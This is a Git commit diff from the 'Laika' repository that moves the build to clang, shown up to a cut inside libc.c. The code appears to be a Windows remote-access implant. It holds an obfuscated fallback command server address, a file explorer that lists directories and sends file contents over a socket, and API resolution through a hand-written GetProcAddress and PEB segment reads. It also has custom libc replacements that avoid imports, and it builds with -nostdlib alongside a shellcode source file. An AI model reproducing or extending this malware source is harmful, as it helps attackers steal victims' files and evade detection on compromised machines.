patate/Laika
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

using clang now

Browse Source
This commit is contained in:
ALittlePatate
2024-09-24 17:13:20 +02:00
parent 22d0e234dd
commit 589fd81942
16 changed files with 436 additions and 139 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -4,6 +4,7 @@
Release Release
x64 x64
*.bin *.bin
*.o
bin bin
obj obj
packages packages

95
Laika/Laika.vcxproj
View File

@@ -23,33 +23,33 @@
<Keyword>Win32Proj</Keyword> <Keyword>Win32Proj</Keyword>
<ProjectGuid>{6c8dd8fe-e960-43b4-b757-effa9fe6bb00}</ProjectGuid> <ProjectGuid>{6c8dd8fe-e960-43b4-b757-effa9fe6bb00}</ProjectGuid>
<RootNamespace>Laika</RootNamespace> <RootNamespace>Laika</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>10.0.22621.0</WindowsTargetPlatformVersion>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>ClangCL</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>ClangCL</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>ClangCL</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset> <PlatformToolset>ClangCL</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@@ -71,13 +71,15 @@
</ImportGroup> </ImportGroup>
<PropertyGroup Label="UserMacros" /> <PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental> <LinkIncremental>
</LinkIncremental>
<OutDir>..\bin\</OutDir> <OutDir>..\bin\</OutDir>
<IntDir>..\obj\</IntDir> <IntDir>..\obj\</IntDir>
<LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath> <LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>true</LinkIncremental> <LinkIncremental>
</LinkIncremental>
<GenerateManifest>false</GenerateManifest> <GenerateManifest>false</GenerateManifest>
<RunCodeAnalysis>false</RunCodeAnalysis> <RunCodeAnalysis>false</RunCodeAnalysis>
<EnableClangTidyCodeAnalysis>false</EnableClangTidyCodeAnalysis> <EnableClangTidyCodeAnalysis>false</EnableClangTidyCodeAnalysis>
@@ -94,13 +96,16 @@
<LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath> <LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental> <LinkIncremental>
<RunCodeAnalysis>true</RunCodeAnalysis> </LinkIncremental>
<EnableClangTidyCodeAnalysis>true</EnableClangTidyCodeAnalysis> <RunCodeAnalysis>false</RunCodeAnalysis>
<EnableClangTidyCodeAnalysis>false</EnableClangTidyCodeAnalysis>
<ClangTidyChecks>*</ClangTidyChecks> <ClangTidyChecks>*</ClangTidyChecks>
<OutDir>..\bin\</OutDir> <OutDir>..\bin\</OutDir>
<IntDir>..\obj\</IntDir> <IntDir>..\obj\</IntDir>
<LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath> <LibraryPath>$(SolutionDir)pasm/bin;../pasm/bin;$(LibraryPath)</LibraryPath>
<GenerateManifest>false</GenerateManifest>
<EnableMicrosoftCodeAnalysis>false</EnableMicrosoftCodeAnalysis>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Label="Vcpkg"> <PropertyGroup Label="Vcpkg">
<VcpkgEnabled>false</VcpkgEnabled> <VcpkgEnabled>false</VcpkgEnabled>
@@ -111,21 +116,31 @@
<SDLCheck>false</SDLCheck> <SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp20</LanguageStandard> <LanguageStandard>stdcpp14</LanguageStandard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BasicRuntimeChecks>Default</BasicRuntimeChecks> <BasicRuntimeChecks>Default</BasicRuntimeChecks>
<BufferSecurityCheck>false</BufferSecurityCheck> <BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>true</FunctionLevelLinking>
<CompileAs>CompileAsC</CompileAs> <CompileAs>CompileAsC</CompileAs>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<SupportJustMyCode>false</SupportJustMyCode>
<IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalOptions>-fwritable-strings %(AdditionalOptions)</AdditionalOptions>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>DebugFull</GenerateDebugInformation>
<AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries> <IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
<EntryPointSymbol>main</EntryPointSymbol> <EntryPointSymbol>main</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>true</ImageHasSafeExceptionHandlers> <ImageHasSafeExceptionHandlers>true</ImageHasSafeExceptionHandlers>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
</Link> </Link>
<CustomBuildStep>
<Command>
</Command>
</CustomBuildStep>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile> <ClCompile>
@@ -135,11 +150,18 @@
<SDLCheck>false</SDLCheck> <SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp20</LanguageStandard> <LanguageStandard>stdcpp14</LanguageStandard>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck> <BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs> <CompileAs>CompileAsC</CompileAs>
<DebugInformationFormat>None</DebugInformationFormat>
<InlineFunctionExpansion>Default</InlineFunctionExpansion>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<OmitFramePointers>false</OmitFramePointers>
<EnableFiberSafeOptimizations>false</EnableFiberSafeOptimizations>
<AdditionalOptions>-fwritable-strings %(AdditionalOptions)</AdditionalOptions>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
@@ -160,7 +182,13 @@
</ForceSymbolReferences> </ForceSymbolReferences>
<IgnoreSpecificDefaultLibraries> <IgnoreSpecificDefaultLibraries>
</IgnoreSpecificDefaultLibraries> </IgnoreSpecificDefaultLibraries>
<ForceFileOutput>
</ForceFileOutput>
</Link> </Link>
<CustomBuildStep>
<Command>
</Command>
</CustomBuildStep>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile> <ClCompile>
@@ -169,38 +197,57 @@
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions> <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<LanguageStandard>stdcpp20</LanguageStandard> <LanguageStandard>stdcpp14</LanguageStandard>
<AdditionalOptions>-fwritable-strings %(AdditionalOptions)</AdditionalOptions>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>pasm.lib;msvcrt.lib;%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>pasm.lib;msvcrt.lib;%(AdditionalDependencies)</AdditionalDependencies>
<EntryPointSymbol>main</EntryPointSymbol>
</Link> </Link>
<CustomBuildStep>
<Command>
</Command>
</CustomBuildStep>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile> <ClCompile>
<WarningLevel>Level3</WarningLevel> <WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck> <SDLCheck>false</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<FavorSizeOrSpeed>Neither</FavorSizeOrSpeed> <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<LanguageStandard>stdcpp20</LanguageStandard> <LanguageStandard>stdcpp14</LanguageStandard>
<OmitFramePointers>false</OmitFramePointers>
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<DebugInformationFormat>None</DebugInformationFormat>
<AdditionalOptions>-fwritable-strings %(AdditionalOptions)</AdditionalOptions>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding> <EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation> <GenerateDebugInformation>DebugFull</GenerateDebugInformation>
<AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>pasm.lib;%(AdditionalDependencies)</AdditionalDependencies>
<IgnoreAllDefaultLibraries> <IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
</IgnoreAllDefaultLibraries> <RandomizedBaseAddress>true</RandomizedBaseAddress>
<RandomizedBaseAddress>false</RandomizedBaseAddress> <SectionAlignment>
<SectionAlignment>16</SectionAlignment> </SectionAlignment>
<EntryPointSymbol>main</EntryPointSymbol>
<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
<ForceFileOutput>
</ForceFileOutput>
</Link> </Link>
<CustomBuildStep>
<Command>
</Command>
</CustomBuildStep>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="file_explorer.c" /> <ClCompile Include="file_explorer.c" />

31
Laika/Makefile Normal file
View File

@@ -0,0 +1,31 @@
SRC = file_explorer.c \
libc.c \
main.c \
resolve_apis.c \
shellcode.c \
utils.c
OBJ = $(SRC:.c=.o)
NAME = Laika.exe
CC = C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\Llvm\x64\bin\clang
CFLAGS = -Os -fno-asynchronous-unwind-tables -DUNICODE -D_UNICODE -m32 -nostdlib -DLAIKA -fwritable-strings -D_WIN32_WINNT=0x0501
BIN_DIR = ../bin
all: $(BIN_DIR)/$(NAME)
$(BIN_DIR)/$(NAME): $(OBJ)
$(MAKE) -C ../pasm -f Makefile_Windows lib
@if not exist $(BIN_DIR) (mkdir $(BIN_DIR))
$(CC) $(CFLAGS) -o $(BIN_DIR)/$(NAME) $(OBJ) -L../pasm/bin/ -lpasm
%.o: %.c
$(CC) $(CFLAGS) -c $< -o $@
clean:
@if exist *.o (del /q *.o)
$(MAKE) -C ../pasm -f Makefile_Windows clean
fclean: clean
@if exist ..\bin (del /q ..\bin\Laika.*)
$(MAKE) -C ../pasm -f Makefile_Windows fclean
.PHONY: all clean fclean

2
Laika/config.h
View File

@@ -1,7 +1,7 @@
#define FALLBACK_SERVERS 1 #define FALLBACK_SERVERS 1
char* fallback_servers[FALLBACK_SERVERS] = { char* fallback_servers[FALLBACK_SERVERS] = {
"6>736;=3:;36", "6>736;=36375",
}; };
int fallback_servers_ip[FALLBACK_SERVERS] = { int fallback_servers_ip[FALLBACK_SERVERS] = {

24
Laika/file_explorer.c
View File

@@ -38,14 +38,14 @@ char get_obj_info(const char* path) {
} }
} }
char* get_file_list(const char* dirPath, int* numFiles) { LAIKA_NOOPT char* get_file_list(const char* dirPath, int* numFiles) {
WIN32_FIND_DATA findData; WIN32_FIND_DATA findData;
HANDLE hFind = NULL; HANDLE hFind = NULL;
WCHAR searchPath[MAX_PATH]; WCHAR searchPath[MAX_PATH];
mbstowcs_(searchPath, dirPath, MAX_PATH); mbstowcs_(searchPath, dirPath, MAX_PATH);
wcscat(searchPath, L"\\*.*"); wcscat_(searchPath, L"\\*.*");
hFind = Api.FindFirstFileW(searchPath, &findData); hFind = Api.FindFirstFileW(searchPath, &findData);
if (hFind == INVALID_HANDLE_VALUE) { if (hFind == INVALID_HANDLE_VALUE) {
@@ -60,12 +60,12 @@ char* get_file_list(const char* dirPath, int* numFiles) {
do { do {
// Convert the file/folder name to a char string // Convert the file/folder name to a char string
WCHAR wFileName[MAX_PATH]; WCHAR wFileName[MAX_PATH];
wcscpy(wFileName, findData.cFileName); wcscpy_(wFileName, findData.cFileName);
char fileName[MAX_PATH]; char fileName[MAX_PATH];
wcstombs_(fileName, wFileName, MAX_PATH); wcstombs_(fileName, wFileName, MAX_PATH);
// Ignore the "." and ".." folders // Ignore the "." and ".." folders
if (strcmp(fileName, ".") == 0 || strcmp(fileName, "..") == 0) { if (strcmp_(fileName, ".") == 0 || strcmp_(fileName, "..") == 0) {
continue; continue;
} }
@@ -74,8 +74,8 @@ char* get_file_list(const char* dirPath, int* numFiles) {
maxFiles *= 2; maxFiles *= 2;
fileList = (char**)Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, fileList, maxFiles * sizeof(char*)); fileList = (char**)Api.Heaprealloc_(_crt_heap, HEAP_ZERO_MEMORY, fileList, maxFiles * sizeof(char*));
} }
fileList[numFound] = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, strlen(fileName) + 1); fileList[numFound] = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, strlen_(fileName) + 1);
strcpy(fileList[numFound], fileName); strcpy_(fileList[numFound], fileName);
numFound++; numFound++;
} while (Api.FindNextFileW(hFind, &findData) != 0); } while (Api.FindNextFileW(hFind, &findData) != 0);
@@ -84,16 +84,16 @@ char* get_file_list(const char* dirPath, int* numFiles) {
// Allocate a buffer to store the concatenated file/folder names separated by "/" // Allocate a buffer to store the concatenated file/folder names separated by "/"
int bufferSize = 0; int bufferSize = 0;
for (int i = 0; i < numFound; i++) { for (int i = 0; i < numFound; i++) {
bufferSize += strlen(fileList[i]) + 1; // add 1 for the separator bufferSize += strlen_(fileList[i]) + 1; // add 1 for the separator
} }
char* fileNames = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, bufferSize); char* fileNames = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, bufferSize);
fileNames[0] = '\0'; fileNames[0] = '\0';
// Concatenate the file/folder names separated by "/" // Concatenate the file/folder names separated by "/"
for (int i = 0; i < numFound; i++) { for (int i = 0; i < numFound; i++) {
strcat(fileNames, fileList[i]); strcat_(fileNames, fileList[i]);
if (i < numFound - 1) { if (i < numFound - 1) {
strcat(fileNames, "/"); strcat_(fileNames, "/");
} }
Api.Heapfree_(_crt_heap, 0, fileList[i]); Api.Heapfree_(_crt_heap, 0, fileList[i]);
} }
@@ -183,7 +183,7 @@ int download_file(HANDLE fp, SOCKET sock) {
// If send would block, wait until the socket is writable // If send would block, wait until the socket is writable
fd_set write_fds; fd_set write_fds;
FD_ZERO(&write_fds); FD_ZERO(&write_fds);
FD_SET(sock, &write_fds); FD_SET_(sock, &write_fds);
if (Api.select(sock + 1, NULL, &write_fds, NULL, NULL) == SOCKET_ERROR) { if (Api.select(sock + 1, NULL, &write_fds, NULL, NULL) == SOCKET_ERROR) {
Api.Heapfree_(_crt_heap, 0, data); Api.Heapfree_(_crt_heap, 0, data);
@@ -193,7 +193,7 @@ int download_file(HANDLE fp, SOCKET sock) {
} }
} }
else { else {
Api.send(sock, "<Laika:EOF>", strlen("<Laika:EOF>"), 0); Api.send(sock, "<Laika:EOF>", strlen_("<Laika:EOF>"), 0);
Api.Heapfree_(_crt_heap, 0, data); Api.Heapfree_(_crt_heap, 0, data);
Api.CloseHandle(fp); Api.CloseHandle(fp);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -207,7 +207,7 @@ int download_file(HANDLE fp, SOCKET sock) {
} }
} }
Api.send(sock, "<Laika:EOF>", strlen("<Laika:EOF>"), 0); Api.send(sock, "<Laika:EOF>", strlen_("<Laika:EOF>"), 0);
Api.CloseHandle(fp); Api.CloseHandle(fp);
Api.Heapfree_(_crt_heap, 0, data); Api.Heapfree_(_crt_heap, 0, data);

192
Laika/libc.c
View File

@@ -1,25 +1,12 @@
#include "libc.h" #include "libc.h"
#include "resolve_apis.h" #include "resolve_apis.h"
size_t strlen_(char* src) { extern LAIKA_NOOPT size_t wchar_to_utf8(wchar_t wc, unsigned char* utf8);
size_t s = 0;
if (src == NULL) #ifdef _MSC_VER
return 0; #pragma optimize("", off)
for (; src[s] != 0; s++); #endif
return s; LAIKA_NOOPT char* strncpy_(char* dest, const char* src, size_t n) {
}
char* strcpy_(char* dest, const char* src) {
size_t i = 0;
for (; src[i] != 0; i++)
dest[i] = src[i];
dest[i] = 0;
return dest;
}
char* strncpy_(char* dest, const char* src, size_t n) {
size_t i = 0; size_t i = 0;
for (; i < n && src[i] != 0; i++) for (; i < n && src[i] != 0; i++)
@@ -29,15 +16,58 @@ char* strncpy_(char* dest, const char* src, size_t n) {
return dest; return dest;
} }
void *memset_(void* a, int val, size_t size) { LAIKA_NOOPT void* memset_(void* a, int val, size_t size) {
if (a == NULL) if (a == NULL)
return NULL; return NULL;
for (size_t i = 0; i < size; i++) for (size_t i = 0; i < size; i++)
((char*)a)[i] = (char)val; ((char*)a)[i] = (char)val;
return a; return a;
} }
int strncmp_(char* a, char* b, size_t size) { LAIKA_NOOPT size_t wcstombs_(char* dest, const wchar_t* src, size_t n) {
size_t count = 0;
unsigned char utf8[4];
while (*src != L'\0' && count < n) {
size_t len = wchar_to_utf8(*src, utf8);
if (len == 0 || count + len > n)
return (size_t)-1;
if (dest != NULL) {
for (size_t i = 0; i < len; i++)
dest[count++] = (char)utf8[i];
}
else
count += len;
src++;
}
if (dest != NULL && count < n)
dest[count] = '\0';
return count;
}
#ifdef _MSC_VER
#pragma optimize("", on)
#endif
LAIKA_NOOPT char* strcpy_(char* dest, const char* src) {
size_t i = 0;
for (; src[i] != 0; i++)
dest[i] = src[i];
dest[i] = 0;
return dest;
}
LAIKA_NOOPT size_t strlen_(char* src) {
size_t s = 0;
if (src == NULL)
return 0;
for (; src[s] != 0; s++);
return s;
}
LAIKA_NOOPT int strncmp_(char* a, char* b, size_t size) {
if (a == NULL || b == NULL) if (a == NULL || b == NULL)
return -1; return -1;
for (size_t i = 0; a[i] != 0 && b[i] != 0 && i < size; i++) for (size_t i = 0; a[i] != 0 && b[i] != 0 && i < size; i++)
@@ -46,7 +76,7 @@ int strncmp_(char* a, char* b, size_t size) {
return 0; return 0;
} }
size_t utf8_char_length(unsigned char c) { LAIKA_NOOPT size_t utf8_char_length(unsigned char c) {
if ((c & 0x80) == 0) return 1; // 1-byte character: 0xxxxxxx if ((c & 0x80) == 0) return 1; // 1-byte character: 0xxxxxxx
if ((c & 0xE0) == 0xC0) return 2; // 2-byte character: 110xxxxx if ((c & 0xE0) == 0xC0) return 2; // 2-byte character: 110xxxxx
if ((c & 0xF0) == 0xE0) return 3; // 3-byte character: 1110xxxx if ((c & 0xF0) == 0xE0) return 3; // 3-byte character: 1110xxxx
@@ -54,7 +84,7 @@ size_t utf8_char_length(unsigned char c) {
return 0; // Invalid UTF-8 return 0; // Invalid UTF-8
} }
wchar_t utf8_to_wchar(const unsigned char* mbstr, size_t* length) { LAIKA_NOOPT wchar_t utf8_to_wchar(const unsigned char* mbstr, size_t* length) {
wchar_t wc = 0; wchar_t wc = 0;
size_t len = utf8_char_length(mbstr[0]); size_t len = utf8_char_length(mbstr[0]);
*length = len; *length = len;
@@ -79,7 +109,7 @@ wchar_t utf8_to_wchar(const unsigned char* mbstr, size_t* length) {
return wc; return wc;
} }
size_t mbstowcs_(wchar_t* dest, const char* src, size_t n) { LAIKA_NOOPT size_t mbstowcs_(wchar_t* dest, const char* src, size_t n) {
size_t count = 0; size_t count = 0;
const unsigned char* mbstr = (const unsigned char*)src; const unsigned char* mbstr = (const unsigned char*)src;
@@ -98,7 +128,7 @@ size_t mbstowcs_(wchar_t* dest, const char* src, size_t n) {
return count; return count;
} }
size_t wchar_to_utf8(wchar_t wc, unsigned char* utf8) { LAIKA_NOOPT size_t wchar_to_utf8(wchar_t wc, unsigned char* utf8) {
if (wc <= 0x7F) { if (wc <= 0x7F) {
utf8[0] = (unsigned char)wc; utf8[0] = (unsigned char)wc;
return 1; return 1;
@@ -124,28 +154,7 @@ size_t wchar_to_utf8(wchar_t wc, unsigned char* utf8) {
return 0; // Invalid wide character return 0; // Invalid wide character
} }
size_t wcstombs_(char* dest, const wchar_t* src, size_t n) { LAIKA_NOOPT int wcscmp_(const wchar_t* s1, const wchar_t* s2) {
size_t count = 0;
unsigned char utf8[4];
while (*src != L'\0' && count < n) {
size_t len = wchar_to_utf8(*src, utf8);
if (len == 0 || count + len > n)
return (size_t)-1;
if (dest != NULL) {
for (size_t i = 0; i < len; i++)
dest[count++] = (char)utf8[i];
}
else
count += len;
src++;
}
if (dest != NULL && count < n)
dest[count] = '\0';
return count;
}
int wcscmp_(const wchar_t* s1, const wchar_t* s2) {
while (*s1 != L'\0' && *s2 != L'\0') { while (*s1 != L'\0' && *s2 != L'\0') {
if (*s1 != *s2) if (*s1 != *s2)
return (*s1 < *s2) ? -1 : 1; return (*s1 < *s2) ? -1 : 1;
@@ -160,7 +169,7 @@ int wcscmp_(const wchar_t* s1, const wchar_t* s2) {
return 1; return 1;
} }
wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle) { LAIKA_NOOPT wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle) {
if (!*needle) if (!*needle)
return (wchar_t*)haystack; return (wchar_t*)haystack;
while (*haystack) { while (*haystack) {
@@ -178,6 +187,51 @@ wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle) {
return NULL; return NULL;
} }
LAIKA_NOOPT wchar_t* wcscat_(wchar_t* dest, const wchar_t* src) {
wchar_t* d = dest;
while (*d != L'\0') {
d++;
}
const wchar_t* s = src;
while (*s != L'\0') {
*d = *s;
d++;
s++;
}
*d = L'\0';
return dest;
}
LAIKA_NOOPT wchar_t* wcscpy_(wchar_t* dest, const wchar_t* src) {
wchar_t* d = dest;
const wchar_t* s = src;
while ((*d++ = *s++) != L'\0') {
}
return dest;
}
LAIKA_NOOPT int strcmp_(const char* s1, const char* s2) {
while (*s1 && (*s1 == *s2)) {
s1++;
s2++;
}
return (*(unsigned char*)s1 - *(unsigned char*)s2);
}
LAIKA_NOOPT char* strcat_(char* dest, const char* src) {
char* d = dest;
while (*d != '\0') {
d++;
}
while (*src != '\0') {
*d++ = *src++;
}
*d = '\0';
return dest;
}
char** split_lines(const char* fileContent, int* lineCount) { char** split_lines(const char* fileContent, int* lineCount) {
int lines = 0; int lines = 0;
const char* start = fileContent; const char* start = fileContent;
@@ -250,7 +304,7 @@ void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
for (DWORD i = 0; i < exportDir->NumberOfNames; i++) { for (DWORD i = 0; i < exportDir->NumberOfNames; i++) {
const char* functionName = (const char*)((BYTE*)hModule + nameRVAs[i]); const char* functionName = (const char*)((BYTE*)hModule + nameRVAs[i]);
if (strcmp(functionName, lpProcName) == 0) { if (strcmp_(functionName, lpProcName) == 0) {
DWORD funcRVA = addrRVAs[ordinals[i]]; DWORD funcRVA = addrRVAs[ordinals[i]];
void* funcPtr = (void*)((BYTE*)hModule + funcRVA); void* funcPtr = (void*)((BYTE*)hModule + funcRVA);
return funcPtr; return funcPtr;
@@ -259,8 +313,38 @@ void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
return NULL; return NULL;
} }
#ifdef _M_X64
unsigned long long __readgsqword_(unsigned long long offset) {
#ifndef _MSC_VER
unsigned long long value;
__asm__ __volatile__(
"movq %%gs:%1, %0"
: "=r" (value)
: "m" (*(unsigned long long*)(offset))
);
return value;
#else
return __readgsqword(offset);
#endif
}
#else
unsigned long __readfsdword_(unsigned long offset) {
#ifndef _MSC_VER
unsigned long value;
__asm__ __volatile__(
"movl %%fs:%1, %0"
: "=r" (value)
: "m" (*(unsigned long*)(offset))
);
return value;
#else
return __readfsdword(offset);
